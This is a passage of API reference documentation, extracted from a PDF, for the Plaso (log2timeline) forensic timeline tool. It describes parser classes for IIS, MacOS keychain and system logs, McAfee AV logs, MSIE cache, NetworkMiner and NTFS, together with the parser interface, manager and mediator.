LOG_LINE_6_0 = {{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} MAX_LINE_LENGTH = 800 NAME = 'winiis' PORT = {W:(0123...) | "-"} ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – structure parsed from the log file. Raises ParseError – when the structure type is unknown. QUERY = {W:(ABCD...) | "-"} URI = {W:(ABCD...) | "-"} USERNAME = {W:(ABCD...) | "-"} VerifyStructure(parser_mediator, line) Verify that this file is an IIS log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line was successfully parsed. Return type bool WORD = {W:(ABCD...) | "-"} plaso.parsers.interface module

The parsers and plugins interface classes. class plaso.parsers.interface.BaseFileEntryFilter Bases: object File entry filter interface. abstract Match(file_entry) Determines if a file entry matches the filter. Parameters file_entry (dfvfs.FileEntry) – a file entry. Returns True if the file entry matches the filter. Return type bool

5.1. Subpackages 381 Plaso (log2timeline), Release 20210606 class plaso.parsers.interface.BaseParser Bases: object The parser interface. ALL_PLUGINS = {'*'} DATA_FORMAT = '' classmethod DeregisterPlugin(plugin_class) Deregisters a plugin class. The plugin classes are identified based on their lower case name. Parameters plugin_class (type) – class of the plugin. Raises KeyError – if plugin class is not set for the corresponding name. EnablePlugins(plugin_includes) Enables parser plugins. Parameters plugin_includes (set[str]) – names of the plugins to enable, where set([‘*’]) represents all plugins. Note the default plugin, if it exists, is always enabled and cannot be disabled. FILTERS = frozenset({}) classmethod GetFormatSpecification() Retrieves the format specification. Returns a format specification or None if not available. Return type FormatSpecification classmethod GetPluginNames() Retrieves the names of registered plugins. Returns names of the plugins. Return type list[str] classmethod GetPluginObjectByName(plugin_name) Retrieves a specific plugin object by its name. Parameters plugin_name (str) – name of the plugin. Returns a plugin object or None if not available. Return type BasePlugin classmethod GetPlugins() Retrieves the registered plugins. Yields tuple[str, type] – name and class of the plugin. NAME = 'base_parser' classmethod RegisterPlugin(plugin_class) Registers a plugin class. The plugin classes are identified based on their lower case name. Parameters plugin_class (type) – class of the plugin. Raises KeyError – if plugin class is already set for the corresponding name. classmethod RegisterPlugins(plugin_classes) Registers plugin classes.

382 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters plugin_classes (list[type]) – classes of plugins. Raises KeyError – if plugin class is already set for the corresponding name. classmethod SupportsPlugins() Determines if a parser supports plugins. Returns True if the parser supports plugins. Return type bool class plaso.parsers.interface.FileEntryParser Bases: plaso.parsers.interface.BaseParser The file entry parser interface. Parse(parser_mediator) Parsers the file entry and extracts event objects. Parameters parser_mediator (ParserMediator) – a parser mediator. Raises UnableToParseFile – when the file cannot be parsed. abstract ParseFileEntry(parser_mediator, file_entry) Parses a file entry. Parameters • parser_mediator (ParserMediator) – a parser mediator. • file_entry (dfvfs.FileEntry) – a file entry to parse. Raises UnableToParseFile – when the file cannot be parsed. class plaso.parsers.interface.FileNameFileEntryFilter(filename) Bases: plaso.parsers.interface.BaseFileEntryFilter File name file entry filter. Match(file_entry) Determines if a file entry matches the filter. Parameters file_entry (dfvfs.FileEntry) – a file entry. Returns True if the file entry matches the filter. Return type bool class plaso.parsers.interface.FileObjectParser Bases: plaso.parsers.interface.BaseParser The file-like object parser interface. Parse(parser_mediator, file_object) Parses a single file-like object. Parameters • parser_mediator (ParserMediator) – a parser mediator. • file_object (dvfvs.FileIO) – a file-like object to parse. Raises UnableToParseFile – when the file cannot be parsed. abstract ParseFileObject(parser_mediator, file_object) Parses a file-like object. Parameters

5.1. Subpackages 383 Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – a parser mediator. • file_object (dvfvs.FileIO) – a file-like object to parse. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.java_idx module

Parser for Java Cache IDX files. class plaso.parsers.java_idx.JavaIDXEventData Bases: plaso.containers.events.EventData Java IDX cache file event data. idx_version format version of IDX file. Type str ip_address IP address of the host in the URL. Type str url URL of the downloaded file. Type str DATA_TYPE = 'java:download:idx' class plaso.parsers.java_idx.JavaIDXParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for Java WebStart Cache IDX files. There are five structures defined. 6.02 files had one generic section that retained all data. From 6.03, thefile went to a multi-section format where later sections were optional and had variable-lengths. 6.03, 6.04, and 6.05 files all have their main data section (#2) begin at offset 128. The short structure is because 6.05 filesdeviate after the 8th byte. So, grab the first 8 bytes to ensure it’s valid, get the file version, then continue onwiththe correct structures. DATA_FORMAT = 'Java WebStart Cache IDX file' NAME = 'java_idx' ParseFileObject(parser_mediator, file_object) Parses a Java WebStart Cache IDX file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dvfvs.FileIO) – a file-like object to parse. Raises UnableToParseFile – when the file cannot be parsed.

384 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.logger module

The parsers sub module logger. plaso.parsers.mac_appfirewall module

Parser for MacOS Application firewall log (appfirewall.log) files. class plaso.parsers.mac_appfirewall.MacAppFirewallLogEventData Bases: plaso.containers.events.EventData MacOS Application firewall log (appfirewall.log) file event data. action action. Type str agent agent that save the log. Type str computer_name name of the computer. Type str process_name name of the entity that tried do the action. Type str status saved status action. Type str DATA_TYPE = 'mac:appfirewall:line' class plaso.parsers.mac_appfirewall.MacAppFirewallParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parser for MacOS Application firewall log (appfirewall.log) files. DATA_FORMAT = 'MacOS Application firewall log (appfirewall.log) file' DATE_TIME = Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) FIREWALL_LINE = {{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) W:(0123...)} W:(0123...)} Suppress:("<")} !W:(>)} Suppress:(">:")} !W:(:)} ":"} SkipTo:(lineEnd)} LINE_STRUCTURES = [('logline', {{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) W:(0123...)} W:(0123...)} Suppress:("<")} !W:(>)} Suppress:(">:")} !W:(:)} ":"} SkipTo:(lineEnd)}), ('repeated', {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("---")} !W:(---)} Suppress:("---")})] NAME = 'mac_appfirewall_log'

5.1. Subpackages 385 Plaso (log2timeline), Release 20210606

ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. REPEATED_LINE = {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("---")} !W:(---)} Suppress:("---")}

VerifyStructure(parser_mediator, line) Verify that this file is a Mac AppFirewall log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.mac_keychain module

Parser for MacOS keychain database files. class plaso.parsers.mac_keychain.KeychainApplicationRecordEventData Bases: plaso.containers.events.EventData MacOS keychain application password record event data. account_name name of the account. Type str comments comments added by the user. Type str entry_name name of the entry. Type str ssgp_hash password/certificate hash formatted as an hexadecimal string. Type str text_description description.

386 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type str DATA_TYPE = 'mac:keychain:application' class plaso.parsers.mac_keychain.KeychainDatabaseColumn Bases: object MacOS keychain database column. attribute_data_type attribute (data) type. Type int attribute_identifier attribute identifier. Type int attribute_name attribute name. Type str class plaso.parsers.mac_keychain.KeychainDatabaseTable Bases: object MacOS keychain database table. columns columns. Type list[KeychainDatabaseColumn] records records. Type list[dict[str, str]] relation_identifier relation identifier. Type int relation_name relation name. Type str class plaso.parsers.mac_keychain.KeychainInternetRecordEventData Bases: plaso.containers.events.EventData MacOS keychain internet record event data. account_name name of the account. Type str comments comments added by the user. Type str entry_name name of the entry.

5.1. Subpackages 387 Plaso (log2timeline), Release 20210606

Type str protocol internet protocol used, for example “https”. Type str ssgp_hash password/certificate hash formatted as an hexadecimal string. Type str text_description description. Type str type_protocol sub-protocol used, for example “form”. Type str where domain name or IP where the password is used. Type str DATA_TYPE = 'mac:keychain:internet' class plaso.parsers.mac_keychain.KeychainParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for MacOS keychain database files. DATA_FORMAT = 'MacOS keychain database file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'mac_keychain' ParseFileObject(parser_mediator, file_object) Parses a MacOS keychain file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed.

388 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.mac_securityd module

Parses MacOS security daemon (securityd) log files. Also see: https://opensource.apple.com/source/Security/Security-55471/sec/securityd class plaso.parsers.mac_securityd.MacOSSecuritydLogEventData Bases: plaso.containers.events.EventData MacOS securityd log event data. caller caller, consists of two hex numbers. Type str facility facility. Type str level priority level. Type str message message. Type str security_api name of securityd function. Type str sender_pid process identifier of the sender. Type int sender name of the sender. Type str DATA_TYPE = 'mac:securityd:line' class plaso.parsers.mac_securityd.MacOSSecuritydLogParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses MacOS security daemon (securityd) log files. DATA_FORMAT = 'MacOS security daemon (securityd) log file' DATE_TIME = Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})

5.1. Subpackages 389 Plaso (log2timeline), Release 20210606

LINE_STRUCTURES = [('logline', {{{{{{{{{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) !W:([)} Suppress:("[")} W:(0123...)} Suppress:("]")} Suppress:("<")} !W:(>)} Suppress:(">")} Suppress:("[")} !W:({)} Suppress:("{")} [!W:(})]} Suppress:("}")} [!W:(]:)]} Suppress:("]:")} SkipTo:(lineEnd)}), ('repeated', {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("--- last message repeated")} W:(0123...)} Suppress:("time ---")})] NAME = 'mac_securityd' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. REPEATED_LINE = {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("--- last message repeated")} W:(0123...)} Suppress:("time ---")} SECURITYD_LINE = {{{{{{{{{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) !W:([)} Suppress:("[")} W:(0123...)} Suppress:("]")} Suppress:("<")} !W:(>)} Suppress:(">")} Suppress:("[")} !W:({)} Suppress:("{")} [!W:(})]} Suppress:("}")} [!W:(]:)]} Suppress:("]:")} SkipTo:(lineEnd)}

VerifyStructure(parser_mediator, line) Verify that this file is a securityd log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.mac_wifi module

Parses for MacOS Wifi log (wifi.log) files. class plaso.parsers.mac_wifi.MacWifiLogEventData Bases: plaso.containers.events.EventData Mac Wifi log event data. action known WiFI action, for example connected to an AP, configured, etc. If the action is not known, the value is the message of the log (text variable).

390 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type str agent name and identifier of process that generated the log message. Type str function name of function that generated the log message. Type str text log message Type str DATA_TYPE = 'mac:wifilog:line' class plaso.parsers.mac_wifi.MacWifiLogParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses MacOS Wifi log (wifi.log) files. DATA_FORMAT = 'MacOS Wifi log (wifi.log) file' LINE_STRUCTURES = [('header', {Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) "***Starting Up***"}), ('turned_over_header', {Group:({{W:(ABCD..., abcd...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Combine:({{{W:(0123...) W:(0123...)} "logfile turned over"} LineEnd})}), ('known_function_logline', {{{{Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) {{"<" Combine:({"airportd" !W:(>)})} ">"}} airportdProcessDLILEvent | _doAutoJoin | _processSystemPSKAssoc} ":"} SkipTo:(lineEnd)}), ('logline', {{Group:({{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}) ~{{{{{"<" Combine:({"airportd" !W:(>)})} ">"} airportdProcessDLILEvent | _doAutoJoin | _processSystemPSKAssoc} ":"}}} SkipTo:(lineEnd)})] NAME = 'macwifi' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. THREE_DIGITS = W:(0123...) THREE_LETTERS = W:(ABCD...) VerifyStructure(parser_mediator, line) Verify that this file is a Mac Wifi log file.

5.1. Subpackages 391 Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.mactime module

Parser for the Sleuthkit (TSK) mactime bodyfile format. Sleuthkit version 3 format: MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime 0|/lost+found|11|d/drwx——|0|0|12288|1337961350|1337961350|1337961350|0 More information about the format specifications can be read here: https://forensicswiki.xyz/wiki/index.php? title=Bodyfile class plaso.parsers.mactime.MactimeEventData Bases: plaso.containers.events.EventData Mactime event data. filename name of the file. Type str inode “inode” of the file. Note that inode is an overloaded term in the context of mactime and used for MFTentry index values as well. Type int md5 MD5 hash of the file content, formatted as a hexadecimal string. Type str mode_as_string protection mode. Type str offset number of the corresponding line, from which the event data was extracted. Type int size size of the file content. Type int symbolic_link_target path of the symbolic link target. Type str user_gid user group identifier (GID).

392 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type int user_sid user security identifier (SID). Type str DATA_TYPE = 'fs:mactime:line' class plaso.parsers.mactime.MactimeParser Bases: plaso.parsers.interface.FileObjectParser SleuthKit bodyfile parser. DATA_FORMAT = 'SleuthKit version 3 bodyfile' NAME = 'mactime' ParseFileObject(parser_mediator, file_object) Parses a mactime bodyfile file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.manager module

The parsers and plugins manager. class plaso.parsers.manager.ParsersManager Bases: object The parsers and plugins manager. ALL_PLUGINS = {'*'} classmethod CheckFilterExpression(parser_filter_expression) Checks parser and plugin names in a parser filter expression. Parameters parser_filter_expression (str) – parser filter expression, where None represents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax. This function does not support presets, and requires a parser filter expression where presets have been expanded. Returns containing: • set(str): parser filter expression elements that contain known parser and/or plugin names. • set(str): parser filter expression elements that contain unknown parser and/or plugin names. Return type tuple

5.1. Subpackages 393 Plaso (log2timeline), Release 20210606

classmethod CreateSignatureScanner(specification_store) Creates a signature scanner for format specifications with signatures. Parameters specification_store (FormatSpecificationStore) – format specifications with signatures. Returns signature scanner. Return type pysigscan.scanner classmethod DeregisterParser(parser_class) Deregisters a parser class. The parser classes are identified based on their lower case name. Parameters parser_class (type) – parser class (subclass of BaseParser). Raises KeyError – if parser class is not set for the corresponding name. classmethod GetFormatsWithSignatures(parser_filter_expression=None) Retrieves the format specifications that have signatures. This method will create a specification store for parsers that define a format specification with signatures and a list of parser names for those that do not. Parameters parser_filter_expression (Optional[str]) – parser filter expression, where None represents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax. This function does not support presets, and requires a parser filter expression where presets have been expanded. Returns containing: • FormatSpecificationStore: format specifications with signatures. • list[str]: names of parsers that do not have format specifications with signatures, or have signatures but also need to be applied ‘brute force’. Return type tuple classmethod GetNamesOfParsersWithPlugins() Retrieves the names of all parsers with plugins. Returns names of all parsers with plugins. Return type list[str] classmethod GetParserObjectByName(parser_name) Retrieves a specific parser object by its name. Parameters parser_name (str) – name of the parser. Returns parser object or None. Return type BaseParser classmethod GetParserObjects(parser_filter_expression=None) Retrieves the parser objects. Parameters parser_filter_expression (Optional[str]) – parser filter expression, where None represents all parsers and plugins.

394 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax. This function does not support presets, and requires a parser filter expression where presets have been expanded. Returns parsers per name. Return type dict[str, BaseParser] classmethod GetParserPluginsInformation(parser_filter_expression=None) Retrieves the parser plugins information. Parameters parser_filter_expression (Optional[str]) – parser filter expression, where None represents all parsers and plugins. A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. See filters/parser_filter.py for details of the expression syntax. This function does not support presets, and requires a parser filter expression where presets have been expanded. Returns pairs of parser plugin names and descriptions. Return type list[tuple[str, str]] classmethod GetParsersInformation() Retrieves the parsers information. Returns parser names and descriptions. Return type list[tuple[str, str]] classmethod RegisterParser(parser_class) Registers a parser class. The parser classes are identified based on their lower case name. Parameters parser_class (type) – parser class (subclass of BaseParser). Raises KeyError – if parser class is already set for the corresponding name. classmethod RegisterParsers(parser_classes) Registers parser classes. The parser classes are identified based on their lower case name. Parameters parser_classes (list[type]) – parsers classes (subclasses of BaseParser). Raises KeyError – if parser class is already set for the corresponding name. plaso.parsers.mcafeeav module

Parser for McAfee Anti-Virus Logs. McAfee AV uses 4 logs to track when scans were run, when virus databases were updated, and when files match the virus database. class plaso.parsers.mcafeeav.McafeeAVEventData Bases: plaso.containers.events.EventData McAfee AV Log event data. action action.

5.1. Subpackages 395 Plaso (log2timeline), Release 20210606

Type str filename filename. Type str offset offset of the line relative to the start of the file, from which the event data wasextracted. Type int rule rule. Type str status status. Type str trigger_location trigger location. Type str username username. Type str DATA_TYPE = 'av:mcafee:accessprotectionlog' class plaso.parsers.mcafeeav.McafeeAccessProtectionParser Bases: plaso.parsers.dsv_parser.DSVParser Parses the McAfee AV Access Protection Log. COLUMNS = ['date', 'time', 'status', 'username', 'filename', 'trigger_location', 'rule', 'action'] DATA_FORMAT = 'McAfee Anti-Virus access protection log file' DELIMITER = '\t' NAME = 'mcafee_protection' ParseRow(parser_mediator, row_offset, row) Parses a line of the log file and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row_offset (int) – offset of the line from which the row was extracted. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. VerifyRow(parser_mediator, row) Verifies if a line of the file is in the expected format. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.

396 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• row (dict[str, str]) – fields of a single row, as specified in COLUMNS. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.mediator module

The parser mediator. class plaso.parsers.mediator.ParserMediator(session, storage_writer, knowledge_base, collection_filters_helper=None, preferred_year=None, resolver_context=None, temporary_directory=None) Bases: object Parser mediator. collection_filters_helper collection filters helper. Type CollectionFiltersHelper last_activity_timestamp timestamp received that indicates the last time activity was observed. The last activity timestamp is updated when the mediator produces an attribute container, such as an event source. This timestamp is used by the multi processing worker process to indicate the last time the worker was known to be active. This information is then used by the foreman to detect workers that are not responding (stalled). Type int AppendToParserChain(plugin_or_parser) Adds a parser or parser plugin to the parser chain. Parameters plugin_or_parser (BaseParser) – parser or parser plugin. ClearParserChain() Clears the parser chain. GetCurrentYear() Retrieves current year. Returns the current year. Return type int GetDisplayName(file_entry=None) Retrieves the display name for a file entry. Parameters file_entry (Optional[dfvfs.FileEntry]) – file entry object, where None will return the display name of self._file_entry. Returns human readable string that describes the path to the file entry. Return type str Raises ValueError – if the file entry is missing. GetDisplayNameForPathSpec(path_spec) Retrieves the display name for a path specification. Parameters path_spec (dfvfs.PathSpec) – path specification. Returns human readable version of the path specification. Return type str

5.1. Subpackages 397 Plaso (log2timeline), Release 20210606

GetEstimatedYear() Retrieves an estimate of the year. This function determines the year in the following manner: * determine if the user provided a preferred year; * determine if knowledge base defines a year derived from preprocessing; * determine the year based on the file entry metadata; * default to the current year; Returns estimated year. Return type int GetFileEntry() Retrieves the active file entry. Returns file entry. Return type dfvfs.FileEntry GetFilename() Retrieves the name of the active file entry. Returns name of the active file entry or None. Return type str GetLatestYear() Retrieves the latest (newest) year for an event from a file. This function tries to determine the year based on the file entry metadata, if that fails the current yearis used. Returns year of the file entry or the current year. Return type int GetParserChain() Retrieves the current parser chain. Returns parser chain. Return type str GetRelativePath() Retrieves the relative path of the current file entry. Returns relateive path of the current file entry or None if no current file entry. Return type str GetRelativePathForPathSpec(path_spec) Retrieves the relative path for a path specification. Parameters path_spec (dfvfs.PathSpec) – path specification. Returns relateive path of the path specification. Return type str PopFromParserChain() Removes the last added parser or parser plugin from the parser chain. ProduceEventDataStream(event_data_stream) Produces an event data stream.

398 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters event_data_stream (EventDataStream) – an event data stream or None if no event data stream is needed. Raises RuntimeError – when storage writer is not set. ProduceEventSource(event_source) Produces an event source. Parameters event_source (EventSource) – an event source. Raises RuntimeError – when storage writer is not set. ProduceEventWithEventData(event, event_data) Produces an event. Parameters • event (EventObject) – event. • event_data (EventData) – event data. Raises InvalidEvent – if the event date_time or timestamp value is not set, or the timestamp value is out of bounds, or if the event data (attribute container) values cannot be hashed. ProduceExtractionWarning(message, path_spec=None) Produces an extraction warning. Parameters • message (str) – message of the warning. • path_spec (Optional[dfvfs.PathSpec]) – path specification, where None will use the path specification of current file entry set in the mediator. Raises RuntimeError – when storage writer is not set. ProduceRecoveryWarning(message, path_spec=None) Produces a recovery warning. Parameters • message (str) – message of the warning. • path_spec (Optional[dfvfs.PathSpec]) – path specification, where None will use the path specification of current file entry set in the mediator. Raises RuntimeError – when storage writer is not set. ResetFileEntry() Resets the active file entry. SampleMemoryUsage(parser_name) Takes a sample of the memory usage for profiling. Parameters parser_name (str) – name of the parser. SampleStartTiming(parser_name) Starts timing a CPU time sample for profiling. Parameters parser_name (str) – name of the parser. SampleStopTiming(parser_name) Stops timing a CPU time sample for profiling. Parameters parser_name (str) – name of the parser.

5.1. Subpackages 399 Plaso (log2timeline), Release 20210606

SetFileEntry(file_entry) Sets the active file entry. Parameters file_entry (dfvfs.FileEntry) – file entry. SetStorageWriter(storage_writer) Sets the storage writer. Parameters storage_writer (StorageWriter) – storage writer. SignalAbort() Signals the parsers to abort. StartProfiling(configuration, identifier, process_information) Starts profiling. Parameters • configuration (ProfilingConfiguration) – profiling configuration. • identifier (str) – identifier of the profiling session used to create the sample filename. • process_information (ProcessInfo) – process information. StopProfiling() Stops profiling. property abort True if parsing should be aborted. Type bool property codepage codepage. Type str property number_of_produced_event_sources number of produced event sources. Type int property number_of_produced_events number of produced events. Type int property number_of_produced_extraction_warnings number of produced extraction warnings. Type int property resolver_context resolver context. Type dfvfs.Context property temporary_directory path of the directory for temporary files. Type str property timezone timezone. Type datetime.tzinfo

400 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

property year year. Type int

plaso.parsers.msiecf module

Parser for Microsoft Internet Explorer (MSIE) Cache Files (CF). class plaso.parsers.msiecf.MSIECFLeakEventData Bases: plaso.containers.events.EventData MSIECF leak event data. cached_filename name of the cached file. Type str cached_file_size size of the cached file. Type int cache_directory_index index of the cache directory. Type int cache_directory_name name of the cache directory. Type str offset offset of the MSIECF item relative to the start of the file, from which the event data wasextracted. Type int recovered True if the item was recovered. Type bool DATA_TYPE = 'msiecf:leak' class plaso.parsers.msiecf.MSIECFParser Bases: plaso.parsers.interface.FileObjectParser Parses MSIE Cache Files (MSIECF). DATA_FORMAT = 'Microsoft Internet Explorer (MSIE) 4 - 9 cache (index.dat) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'msiecf' ParseFileObject(parser_mediator, file_object) Parses a MSIE Cache File (MSIECF) file-like object. Parameters

5.1. Subpackages 401 Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. class plaso.parsers.msiecf.MSIECFRedirectedEventData Bases: plaso.containers.events.EventData MSIECF redirected event data. offset offset of the MSIECF item relative to the start of the file, from which the event data wasextracted. Type int recovered True if the item was recovered. Type bool url location URL. Type str DATA_TYPE = 'msiecf:redirected' class plaso.parsers.msiecf.MSIECFURLEventData Bases: plaso.containers.events.EventData MSIECF URL event data. cached_filename name of the cached file. Type str cached_file_size size of the cached file. Type int cache_directory_index index of the cache directory. Type int cache_directory_name name of the cache directory. Type str http_headers HTTP headers. Type str number_of_hits number of hits. Type int offset offset of the MSIECF item relative to the start of the file, from which the event data wasextracted. Type int

402 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

recovered True if the item was recovered. Type bool url location URL. Type str DATA_TYPE = 'msiecf:url' plaso.parsers.networkminer module

Parser for NetworkMiner .fileinfos files. class plaso.parsers.networkminer.NetworkMinerEventData Bases: plaso.containers.events.EventData NetworkMiner event Data. destination_ip Destination IP address. Type str destination_port Destination port number. Type str file_details Details about the file. Type string file_md5 MD5 hash of the file. Type string file_path File path to where it was downloaded. Type string file_size Size of the file. Type string filename Name of the file. Type string source_ip Originating IP address. Type str source_port Originating port number. Type str

5.1. Subpackages 403 Plaso (log2timeline), Release 20210606

DATA_TYPE = 'networkminer:fileinfos:file' class plaso.parsers.networkminer.NetworkMinerParser Bases: plaso.parsers.dsv_parser.DSVParser Parser for NetworkMiner .fileinfos files. COLUMNS = ('source_ip', 'source_port', 'destination_ip', 'destination_port', 'filename', 'file_path', 'file_size', 'unused', 'file_md5', 'unused2', 'file_details', 'unused4', 'timestamp') DATA_FORMAT = 'NetworkMiner .fileinfos file' MIN_COLUMNS = 13 NAME = 'networkminer_fileinfo' ParseRow(parser_mediator, row_offset, row) Parses a line of the log file and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row_offset (int) – line number of the row. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. VerifyRow(parser_mediator, row) Verifies if a line of the file is in the expected format. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. Returns True if this is the correct parser, False otherwise. Return type bool

plaso.parsers.ntfs module

Parser for NTFS metadata files. class plaso.parsers.ntfs.NTFSFileStatEventData Bases: plaso.containers.events.EventData NTFS file system stat event data. attribute_type attribute type for example “0x00000030”, which represents “$FILE_NAME”. Type int display_name display name. Type str file_attribute_flags NTFS file attribute flags. Type int

404 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

